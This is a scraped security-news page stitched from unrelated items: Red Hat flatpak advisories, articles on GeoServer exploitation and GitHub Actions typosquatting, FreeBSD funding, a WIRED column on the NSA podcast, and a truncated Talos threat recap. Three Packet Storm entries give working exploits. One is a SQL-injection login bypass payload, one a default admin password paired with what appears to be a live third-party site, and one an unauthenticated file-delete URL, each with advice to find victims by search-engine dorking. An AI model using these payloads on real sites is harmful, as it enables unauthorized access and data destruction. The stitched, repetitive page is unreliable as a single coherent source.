Online Shopping Portal Project version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Online Shopping Portal Project 2.0 auth by pass Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/wp-content/uploads/2018/03/Online-Shopping-Portal-project-V2.0.zip                                   |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] http://127.0.0.1/shopping/ADMIN/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Shopping Portal Project 2.0 SQL Injection

Red Hat Security Advisory 2024-6418-03 - An update for bubblewrap and flatpak is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6418.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: bubblewrap and flatpak security updateAdvisory ID:        RHSA-2024:6418-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6418Issue date:         2024-09-05Revision:           03CVE Names:          CVE-2024-42472====================================================================Summary: An update for bubblewrap and flatpak is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Bubblewrap (/usr/bin/bwrap) is a core execution engine for unprivileged containers that works as a setuid binary on kernels without user namespaces.Security Fix(es):* flatpak: Access to files outside sandbox for apps using persistent= (--persist) (CVE-2024-42472)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-42472References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-6418-03

Red Hat Security Advisory 2024-6417-03 - An update for flatpak is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6417.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: flatpak security updateAdvisory ID:        RHSA-2024:6417-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6417Issue date:         2024-09-05Revision:           03CVE Names:          CVE-2024-42472====================================================================Summary: An update for flatpak is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 7-ELS Release Notes linked from the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-42472References:https://access.redhat.com/security/updates/classification/#importanthttps://docs.redhat.com/en/documentation/red_hat_enterprise_linux/7-ELS/html/7-ELS_release_notes/index

Red Hat Security Advisory 2024-6417-03

Online Pizza Ordering System version 1.0 suffers from an ignored default credential vulnerability.

**Online Pizza Ordering System 1.0 Insecure Settings**

Posted Sep 6, 2024

Authored by indoushka

Online Pizza Ordering System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | ea183be601d90798e6a525ee32f1811b36b16ef45e82b7172ff7fd9dada60b8e

Download | Favorite | View

**Online Pizza Ordering System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Online Pizza Ordering System v1.0 Insecure Settings Vulnerability                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,685)
*   Arbitrary (17,036)
*   BBS (2,859)
*   Bypass (1,902)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,203)
*   Encryption (2,393)
*   Exploit (54,137)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (917)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,207)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,401)
*   Protocol (3,749)
*   Python (1,654)
*   Remote (31,825)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,041)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,700)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,054)
*   Web (10,130)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,117)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,066)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,731)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,807)
*   UNIX (9,449)
*   UnixWare (187)
*   Windows (6,762)
*   Other

Online Pizza Ordering System 1.0 Insecure Settings

File Management System version 1.0 suffers from an insecure direct object reference vulnerability.

**File Management System 1.0 Insecure Direct Object Reference**

Posted Sep 6, 2024

Authored by indoushka

File Management System version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 80d45521f02111223db9c15921f68ebb49c243151cc2e7da343578636283f910

Download | Favorite | View

**File Management System 1.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : File Management System 1.0 IDOR Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Payload enables deletion of uploaded files from admin control panel without login.[+] use payload : /Private_Dashboard/delete.php?ID=5[+] 127.0.0.1/demo/Private_Dashboard/delete.php?ID=5Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,685)
*   Arbitrary (17,036)
*   BBS (2,859)
*   Bypass (1,902)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,203)
*   Encryption (2,393)
*   Exploit (54,137)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (917)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,207)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,401)
*   Protocol (3,749)
*   Python (1,654)
*   Remote (31,825)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,041)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,700)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,054)
*   Web (10,130)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,117)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,066)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,731)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,807)
*   UNIX (9,449)
*   UnixWare (187)
*   Windows (6,762)
*   Other

File Management System 1.0 Insecure Direct Object Reference

A recently disclosed security flaw in OSGeo GeoServer GeoTools has been exploited as part of multiple campaigns to deliver cryptocurrency miners, botnet malware such as Condi and JenX, and a known backdoor called SideWalk.
The security vulnerability is a critical remote code execution bug (CVE-2024-36401, CVSS score: 9.8) that could allow malicious actors to take over susceptible instances.
In

Cryptocurrency / APT Attack

A recently disclosed security flaw in OSGeo GeoServer GeoTools has been exploited as part of multiple campaigns to deliver cryptocurrency miners, botnet malware such as Condi and JenX, and a known backdoor called SideWalk.

The security vulnerability is a critical remote code execution bug (CVE-2024-36401, CVSS score: 9.8) that could allow malicious actors to take over susceptible instances.

In mid-July, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added it to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The Shadowserver Foundation said it detected exploitation attempts against its honeypot sensors starting July 9, 2024.

According to Fortinet FortiGuard Labs, the flaw has been observed to deliver GOREVERSE, a reverse proxy server designed to establish a connection with a command-and-control (C2) server for post-exploitation activity.

These attacks are said to target IT service providers in India, technology companies in the U.S., government entities in Belgium, and telecommunications companies in Thailand and Brazil.

The GeoServer server has also served as a conduit for Condi and a Mirai botnet variant dubbed JenX, and at least four types of cryptocurrency miners, one of which is retrieved from a fake website that impersonates the Institute of Chartered Accountants of India (ICAI).

Perhaps the most notable of the attack chains leveraging the flaw is the one that propagates an advanced Linux backdoor called SideWalk, which is attributed to a Chinese threat actor tracked as APT41.

The starting point is a shell script that's responsible for downloading the ELF binaries for ARM, MIPS, and X86 architectures, which, in turn, extracts the C2 server from an encrypted configuration, connects to it, and receives further commands for execution on the compromised device.

This includes running a legitimate tool known as Fast Reverse Proxy (FRP) to evade detection by creating an encrypted tunnel from the host to the attacker-controlled server, allowing for persistent remote access, data exfiltration, and payload deployment.

"The primary targets appear to be distributed across three main regions: South America, Europe, and Asia," security researchers Cara Lin and Vincent Li said.

"This geographical spread suggests a sophisticated and far-reaching attack campaign, potentially exploiting vulnerabilities common to these diverse markets or targeting specific industries prevalent in these areas."

The development comes as CISA this week added to its KEV catalog two flaws found in 2021 in DrayTek VigorConnect (CVE-2021-20123 and CVE-2021-20124, CVSS scores: 7.5) that could be exploited to download arbitrary files from the underlying operating system with root privileges.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

GeoServer Vulnerability Targeted by Hackers to Deliver Backdoors and Botnet Malware

Threat actors have long leveraged typosquatting as a means to trick unsuspecting users into visiting malicious websites or downloading booby-trapped software and packages.

These attacks typically involve registering domains or packages with names slightly altered from their legitimate counterparts (e.g., goog1e.com vs. google.com).

Adversaries targeting open-source repositories across

Software Security / Hacking

Threat actors have long leveraged typosquatting as a means to trick unsuspecting users into visiting malicious websites or downloading booby-trapped software and packages.

These attacks typically involve registering domains or packages with names slightly altered from their legitimate counterparts (e.g., goog1e.com vs. google.com).

Adversaries targeting open-source repositories across platforms have relied on developers making typing errors to initiate software supply chain attacks through PyPI, npm, Maven Central, NuGet, RubyGems, and Crate.

The latest findings from cloud security firm Orca show that even GitHub Actions, a continuous integration and continuous delivery (CI/CD) platform, is not immune from the threat.

"If developers make a typo in their GitHub Action that matches a typosquatter's action, applications could be made to run malicious code without the developer even realizing," security researcher Ofir Yakobi said in a report shared with The Hacker News.

The attack is possible because anyone can publish a GitHub Action by creating a GitHub account with a temporary email account. Given that actions run within the context of a user's repository, a malicious action could be exploited to tamper with the source code, steal secrets, and use it to deliver malware.

All that the technique involves is for the attacker to create organizations and repositories with names that closely resemble popular or widely-used GitHub Actions.

If a user makes inadvertent spelling errors when setting up a GitHub action for their project and that misspelled version has already been created by the adversary, then the user's workflow will run the malicious action as opposed to the intended one.

"Imagine an action that exfiltrates sensitive information or modifies code to introduce subtle bugs or backdoors, potentially affecting all future builds and deployments," Yakobi said.

"In fact, a compromised action can even leverage your GitHub credentials to push malicious changes to other repositories within your organization, amplifying the damage across multiple projects."

Orca said that a search on GitHub revealed as many as 198 files that invoke "action/checkout" or "actons/checkout" instead of "actions/checkout" (note the missing "s" and "i"), putting all those projects at risk.

This form of typosquatting is appealing to threat actors because it's a low-cost, high-impact attack that could result in powerful software supply chain compromises, affecting several downstream customers all at once.

Users are advised to double-check actions and their names to ensure they are referencing the correct GitHub organization, stick to actions from trusted sources, and periodically scan their CI/CD workflows for typosquatting issues.

"This experiment highlights how easy it is for attackers to exploit typosquatting in GitHub Actions and the importance of vigilance and best practices in preventing such attacks," Yakobi said.

"The actual problem is even more concerning because here we are only highlighting what happens in public repositories. The impact on private repositories, where the same typos could be leading to serious security breaches, remains unknown."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

GitHub Actions Vulnerable to Typosquatting, Exposing Developers to Hidden Malicious Code

The funds from Germany's Sovereign Tech Fund will be used to integrate zero-trust capabilities, tools for software bill of materials, and other security features.

Source: Les Polders via Alamy Stock Photo

The health of the global Internet and digital infrastructure relies heavily on volunteer-maintained open source projects. Various organizations and initiatives now provide funding to make security fixes or improve features for some of these projects.

Last week, the FreeBSD Foundation announced a €686,400 (approximately $762,540) investment from Germany's Sovereign Tech Fund. The foundation drives development and maintenance of the FreeBSD operating system, a Unix-based operating system similar to Linux. The funding from STF is intended to cover work for the rest of 2024 and extend into 2025 and will focus on security features and improvements.

STF is supported by the German Federal Ministry for Economic Affairs and Climate Action (BMWK) and is hosted by the German Federal Agency for Disruptive Innovation (SPRIND). The fund has actively supported open source projects that are important components of the global digital infrastructure, such as €1 million ($1.1 million) for GNOME (a widely used desktop application for Linux operating systems) development at the end of last year and €203,000 ($225,487) to GStreamer (a multimedia framework used widely in streaming apps, embedded devices, and browsers) earlier this year. Several of STF's recent investments are tied to security improvements, such as making the encrypted home directory a GNOME feature and rewriting GStreamer's various Web and networking protocols (RTP/RTCP, RTSP, and WebRTC) from C to Rust to eliminate recurring memory-based vulnerabilities.

The FreeBSD investment will also focus on several security initiatives, such as zero-trust builds, continuous integration/continuous delivery (CI/CD) automation, reducing technical debt, enhancing security controls, and improving tools related to the software bill of materials. Reducing technical debt is important since many vulnerabilities linger on in years-old components that are no longer being maintained or even looked at.

Zero-trust builds refer to the ability to prove where all the source code and tooling used in FreeBSD came from and are trusted. This is necessary to ensure that the tools used (such as compilers) are not introducing backdoors or malware into the code.

The focus on CI/CD automation is necessary to streamlining software delivery and operations. It will allow for constantly running security tests to ensure that changes have not introduced vulnerabilities and fixing them as they are found.

"This investment in critical digital infrastructure will accelerate modernization of FreeBSD, enhance security hygiene, and improve developer experiences," said Fiona Krakenbürger, co-founder of STF, in a statement.

STF has supported a slew of other open source projects, including curl, FFmpeg, Rustls (a TLS library written in Rust), and Coreutils uutils (the coreutils library with basic file, shell, and text functions rewritten in Rust).

FreeBSD Gets €686,400 to Boost Security Features

The spy agency that dared not speak its name is now the Joe Rogan of the SIGINT set. And the pod's actually worth a listen.

My first story for WIRED—yep, 31 years ago—looked at a group of “crypto rebels” who were trying to pry strong encryption technology from the government-classified world and send it into the mainstream. Naturally I attempted to speak to someone at the National Security Agency for comment and ideally get a window into its thinking. Unsurprisingly, that was a no-go, because the NSA was famous for its reticence. Eventually we agreed that I could fax (!) a list of questions. In return I got an unsigned response in unhelpful bureaucratese that didn’t address my queries. Even that represented a loosening of what once was total blackout on anything having to do with this ultra-secretive intelligence agency. For decades after its post–World War II founding, the government revealed nothing, not even the name, of this agency and its activities. Those in the know referred to it as “No Such Agency.”

In recent years, the widespread adoption of encryption technology and the vital need for cybersecurity has led to more openness. Its directors began to speak in public; in 2012, NSA director Keith Alexander actually keynoted Defcon. I’d spent the entire 1990s lobbying to visit the agency for my book _Crypto_; in 2013, I finally crossed the threshold of its iconic Fort Meade Headquarters for an on-the-record conversation with officials, including Alexander. NSA now has social media accounts on Twitter, Instagram, Facebook. And there is a form on the agency website for podcasters to request guest appearances by an actual NSA-ite.

So it shouldn’t be a total shock that NSA is now _doing its own podcast._ You don’t need to be an intelligence agency to know that pods are a unique way to tell stories and hold people’s attention. The first two episodes of the seven-part season dropped this week. It’s called _No Such Podcast_, earning some self-irony points from the get-go.

In keeping with the openness vibe, the NSA granted me an interview with an official in charge of the project—one of the de facto podcast producers, a title that apparently is still not an official NSA job posting. Since NSA still gotta NSA, I can’t use this person’s name. But my source did point out that in the podcast itself, both the hosts and the guests—who are past and present agency officials—speak under their actual identities. We conducted the interview via Microsoft Teams; my spokesperson and one of the hosts were in a room with an impressive background of the official seals of the NSA, the Central Security Service, and the United States Cyber Command. I did my end from a World Trade Center conference room, praying my Wi-Fi wouldn’t cut out.

Why an NSA podcast? The spokesperson explains that the NSA has the world’s best cryptologists and cryptanalysts, all of whom work in silence, and the agency wanted to talk about their critical and amazing work. “The podcast,” the spokesperson says, “is a medium that allows for good storytelling and conversation that is distinct from things we already engage in. It provides a different level of connection.” I later received a statement from Sara Siegle, the NSA’s head of strategic communications, echoing that point: “NSA believes in showcasing the incredible, dedicated work of our diverse, expert workforce. _No Such Podcast_ extends our existing efforts into a new and growing medium.” Got it.

I suggest some secondary motivations. Some of the NSA’s social media posts solicit workers, and this podcast seems likewise designed to appeal to STEM graduates who might place patriotism over working for Google or a startup. My source acknowledged that this was the case. “Recruitment is not the number one goal of the podcast, but we are certainly hoping that by showcasing the work we do here, and the real people on the show who work here, listeners might say, ‘Oh, that sounds like a really cool job—and that person seems pretty normal, right?’”

The NSA also apparently sees the podcast as a chance to answer some critics who charge that the agency is a Big Brother-ish snooping operation that threatens our privacy. In the very first episode, guest speaker Natalie Laing, the NSA’s director of operations, speaks at length about how the NSA limits itself to information relevant to national security and similar imperatives. “Compliance is our number one focus,” she says. By hitting this note so hard that my Apple Watch sent me a volume alert, the NSA seems to be using the podcast format to address suspicions that it violates privacy—especially after the shocking revelations from Edward Snowden about how much stuff the NSA does grab. (I am told Snowden’s name is not uttered in the entire NSA podcast series—no such person?)

The NSA used fairly traditional marketing skills to figure out the format of its podcast. It checked out not only popular pods, but those of its sister intelligence agencies. Yes, the CIA and FBI are already in the game. The NSA finally settled on a classical interview format where a revolving set of four hosts—not outside professionals, but the winners of an internal talent search for employees with broadcast skills—talk with officials about the agency’s operations and exploits. “We definitely wanted that conversational tone that provides space for our guests to share their expertise and stories in a way that doesn’t really feel like lectures,” says my spokesperson. The podcasts were recorded in the NSA’s own in-house video studio. That is a sentence that you will never find in a John LeCarré novel.

As you would expect, there is a lot of vetting to make sure that none of the stories shared on the pod are classified, or would compromise future operations. No, we will not find out whether there is a quantum computer in the basement of the NSA’s Fort Meade, Maryland, headquarters. While the numbers of reviewers varied by episode, I was assured it was more than a dozen and less than a hundred.

I’ve read the transcripts for the first two episodes. The series opens with a bang, with episode 1 recounting the NSA’s role in finding Osama Bin Laden. As background to the narrative, Laing and the other guest, former director of operations Jon Darby, provide a rather detailed precis of the workings of signals intelligence, or SIGINT in spook-speak, which is the core activity of the agency. They give a once-unthinkably straightforward rundown of what the NSA calls its “production cycle”—the way it grabs signals, analyzes them, and distributes them to US officials, the military, our allies, and even some people in the private sector. The information is familiar to those who have been studying intelligence agencies, or at least reading spy novels, but for many years the NSA would confirm none of this.

The description of how SIGINT helped find Bin Laden was gripping, but I missed a journalistic toughness in the questioning. Paging Barton Gellman or our own Andy Greenberg! At one point Jon Darby said, “… the fall of 2001—that’s when we really started really looking for Bin Laden.” Since the NSA was well aware al-Qaeda had already run terror operations against the US, why not earlier? And maybe an explanation of why we were blindsided by 9/11? Another question: While it’s an inspiring triumph that we located Bin Laden, it did take over 10 years. Given how much we pay for the NSA, is that acceptable?

The second episode is about cybersecurity. It struck me as relatively vague, with a lot of talk about the importance of protecting information for the military and even the space program but fewer concrete examples. The guests talk about stopping ransomware attacks but don’t say how. I would have liked to have heard more about how the NSA works with private industry to protect our infrastructure. Or doesn’t. A few spectacular breaches in recent years exposed critical government information, including several whopping hacks of Microsoft by the Russians and the Chinese. Those didn’t make it in that episode.

Still, _No Such Podcast_ can be revealing. The Bin Laden episode had a brief but intriguing digression about encryption. (Future episodes, I am told, will dive deeper into the subject, including one about the history of cryptography.) During the 1990s the NSA had been an active opponent of strong public encryption. But at the end of the decade, the Clinton Administration seemingly ended the Crypto Wars by allowing the private sector to employ the techniques. Nowadays we’ve got the FBI and other law enforcement officials caterwauling about the danger of end-to-end encryption in software made by Apple, Meta, and others. But in this podcast, the NSA’s head of operations is not crying doomsday. To the contrary, Laing brags about how the great codebreakers at the NSA, despite the revolution in private sector cryptography, are still able to get the job done. “Our ability to impact in a positive way our nation's national security, to defend our nation, that has not changed … Every day I am a little gobsmacked at the talent that we have at this agency and the things they are able to do. That absolutely has not changed. And what else hasn't changed is, we can't tell people about it generally.” While the FBI is screaming that we’re doomed if we don’t rein in end-to-end crypto, here is the NSA saying, “We got this.”

For that reason I’ll give a thumbs-up to _No Such Podcast_. Yes, it’s kind of propagandistic—how could it be otherwise?—but despite the podcast’s selective spin on its activities, there’s more signal here than noise. As a bonus, there are no ads for energy drinks, gold bullion, or newly minted cryptocurrency tokens. Also, I’m curious to hear the NSA’s take on artificial intelligence, the subject of an upcoming episode.

Before I end my discussion with the NSA, I ask a question that is top of mind for every podcaster: Will _No Such Podcast_ be picked up for season 2? “We can neither confirm or deny,” says the unnamed person I spoke to. Now _that’s_ the NSA I know.

**Time Travel**

During the six years I spent writing _Crypto_, I begged and begged to visit the NSA, to no avail. After many months of negotiation, I finally got an official interview with a key source. It was conducted at the National Cryptologic Museum, just outside the agency’s gates. Maybe that was an early sign of the thaw that has led to this podcast. But as I documented in my book, in the NSA’s first decades, silence—and an electrified, triple-layered barbed-wire fence—enveloped all that the agency touched or dealt with.

_Since all the salient information about modern crypto was withheld from public view, outsiders could only guess what happened in “The Fort.” The NSA undoubtedly operated the most sophisticated snooping operation in the world. It was universally assumed (though never admitted) that no foreign phone call, radio broadcast, or telegraph transmission was safe from the agency’s global vacuum cleaner. Signals were sucked up and the contents analyzed with a multi-MIPS computer, combing the text for anything of value. …_

_What’s more, the NSA considered itself the sole repository of cryptographic information—not just that used by the civilian government and all the armed forces, as the law dictated, but that used by the private sector as well. Ultimately, the triple-depth fence surrounding its headquarters was not only a physical barrier but a metaphor for the NSA’s near-fanatical drive to hide information about itself and its activities. In the United States of America, serious crypto existed only behind the Triple Fence._

**Ask Me One Thing**

Chris asks, “All things considered, has the internet been a good or bad thing? Or, what percentage good or bad?”

Thanks for the question, Chris. You do realize that the internet is the big, all-encompassing blob where we all now live, right? You might as well ask whether civilization is a good thing. I can think of lots of reasons to answer in the negative, but none that would send me into a cave.

Look, a lot of us went overboard 30 years ago when we realized that the internet was going to be pervasive and revolutionary, and it seemed like an opportunity to do a constructive reset on a lot of things that stood in the way of access and equality and the generally calcified way that media operated. Some of those lofty visions came true, and some unexpected hellscapes arose. Overall, the mistake that the optimists made was somehow forgetting that it would be _people_ who would make the internet what it was, and what it would become. No matter how technology might nudge us into comity, a lot of humanity won’t go there no matter what. And the massive scale of the internet, as well as the riches to be gained, can lure even the most idealistic founders into breaking bad.

I still believe that the internet provides a pathway for the best of humanity to shine. But a lot of people are simply awful, and way too many of them are in your face all the time now. So my answer is 58-42—on the side of the good. No cave for me.

_You can submit questions to_ _mail@wired.com. Write **ASK LEVY** in the subject line._

**End Times Chronicle**

1943: Publication of Herman Hesse’s futuristic, trippy final novel, _The Glass Bead Game_. Last week: Analysis of material from a Chinese space probe reveals glass beads on the moon. Just sayin’.

**Last but Not Least**

Russia’s most feared military intelligence agency now has a cyber warfare team. A meaty subject for _No Such Podcast_!

It wasn’t the NSA but the State Department that discovered the Chinese hacker of Microsoft—and that’s just one thing Secretary of State Anthony Blinken talks about in our Big Interview.

Blinken also goes on camera as the Big Interview now has video!

WIRED hunted hidden police signals at the Democratic Convention–our own SIGINT op!

_Updated 09-06-24, 12:20 pm ET: The story was updated to correct the description of the seals in an NSA meeting room._

_Don't miss future subscriber-only editions of this column._ _**Subscribe to WIRED (50% off for Plaintext readers)**_ _today._

The NSA Has a Podcast—Here's How to Decode It

Talos' Nick Biasini discusses the biggest shifts and trends in the threat landscape so far. We also focus on one state sponsored actor that has been particularly active this year, and talk about why defenders need to be paying closer attention to infostealers.

Friday, September 6, 2024 08:59

As we head into the final furlong of 2024, we caught up with Talos’ Head of Outreach Nick Biasini to ask him what sort of year it’s been so far in the threat landscape. 

In this video, Nick outlines his two major areas of concern. He also focusses on one state-sponsored actor that has been particularly active this year (Clue: It rhymes with “Bolt Teaspoon”), and we talk about why the infostealer market has gone through a maturing phase, and why that’s an issue for defenders.

After you’ve watched the video, I’ve highlighted some of our threat spotlight blogs from the year so far below, which may be worth a revisit.

**2024 in threat research:**

**Jan. 18:** **Exploring malicious Windows drivers**

Drivers have long been of interest to threat actors, whether they are exploiting vulnerable drivers or creating malicious ones. Malicious drivers are difficult to detect and successfully leveraging one can give an attacker full access to a system. Part 1 of our Driver series served as a starting point for learning about malicious drivers while part 2, released in June, covered the I/O system, IRPs, stack locations, IOCTLs and more.

**Feb. 8:** **New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization**

Talos discovered a new, stealthy espionage campaign that likely persisted since at least March 2021. The observed activity affects an Islamic non-profit organization using backdoors for a previously unreported malware family we have named “Zardoor.” 

**Feb. 15:** **TinyTurla Next Generation — Turla APT spies on Polish NGOs**

This backdoor we called “TinyTurla-NG” (TTNG) was similar to Turla’s previously disclosed implant, TinyTurla, in coding style and functionality implementation.

**Feb. 20:** **Astaroth, Mekotio & Ousaban abusing Google Cloud Run in LATAM-focused malware campaigns**

Since September 2023, we observed a significant increase in the volume of malicious emails leveraging the Google Cloud Run service to infect potential victims with banking trojans.

**Feb. 27:** **TimbreStealer campaign targets Mexican users with financial lures**

Talos observed a phishing spam campaign targeting victims in Mexico, luring users to download a new obfuscated information stealer we’re calling TimbreStealer, which has been active since at least November 2023.

**March 5:** **GhostSec’s joint ransomware operation and evolution of their arsenal**

We observed a surge in GhostSec’s malicious activities this past year. GhostSec evolved with a new GhostLocker 2.0 ransomware, a Golang variant of the GhostLocker ransomware.

**April 9:** **Starry Addax targets human rights defenders in North Africa with new malware**

We disclosed a new threat actor we deemed “Starry Addax” targeting mostly human rights activists, associated with the Sahrawi Arab Democratic Republic (SADR) cause with a novel mobile malware.

**April 16:** **Large-scale brute-force activity targeting VPNs, SSH services with commonly used login credentials**

Talos actively monitored a global increase in brute-force attacks against a variety of targets, including Virtual Private Network (VPN) services, web application authentication interfaces and SSH services since at least March 18, 2024.  

**April 17:** **OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal**

During a threat-hunting exercise, Talos discovered documents with potentially confidential information originating from Ukraine. The documents contained malicious VBA code, indicating they may be used as lures to infect organizations. 

**April 23:** **Suspected CoralRaider continues to expand victimology using three information stealers**

Talos discovered a new PowerShell command-line argument embedded in the LNK file to bypass anti-virus products and download the final payload into the victims’ host.

**April 24:** **ArcaneDoor — New espionage-focused campaign found targeting perimeter network devices**

ArcaneDoor was a campaign that was the latest example of state-sponsored actors targeting perimeter network devices from multiple vendors. Coveted by these actors, perimeter network devices are the perfect intrusion point for espionage-focused campaigns.

**May 22:** **From trust to trickery: Brand impersonation over the email attack vector**

Cisco developed and released a new feature to detect brand impersonation in emails when adversaries pretend to be a legitimate corporation.

**May 31:** **New banking trojan “CarnavalHeist” targets Brazil with overlay attacks**

